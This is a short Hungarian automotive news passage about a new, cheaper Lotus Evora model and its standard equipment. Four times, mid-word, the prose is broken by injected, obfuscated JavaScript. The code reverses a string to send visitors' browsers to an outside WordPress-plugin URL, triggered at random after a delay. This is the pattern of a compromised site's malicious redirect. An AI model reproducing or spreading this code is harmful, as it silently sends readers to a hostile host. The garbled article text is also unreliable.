Eddig egyetlen típus: a GT410 Sport árválkodott az Evora családfáján, most azonban megérkezett a kis testvér. Legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb ismertetőjegye, hogy 3000 fonttal (3,5%-kal) olcsóbb a Sport verziónál – így “mindössze” 82 900 angol fontba, azaz szűk 33 millió forintba kerül -, alapfelszereltsége ugyanakkor gazdagabb annál. Kapott például légkondicionálót, ami feltétlenül előny egy utcai autónál, a manőverezést toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolatókamera segíti. Sőt, navigációs rendszer, nagy hifi, okostelefon-integrációé és DAB digitális rádió is került a kocsiba (ezeket a tételeket amúgy azóta suttyomban a GT410 Sportba is beszerelték, de eredetileg hiányoztak belőle). Javítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották az utastér hangszigetelését is, az ülések fűthetők, és toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolatóradar is van. Az ajtókra…
- Hirdetés -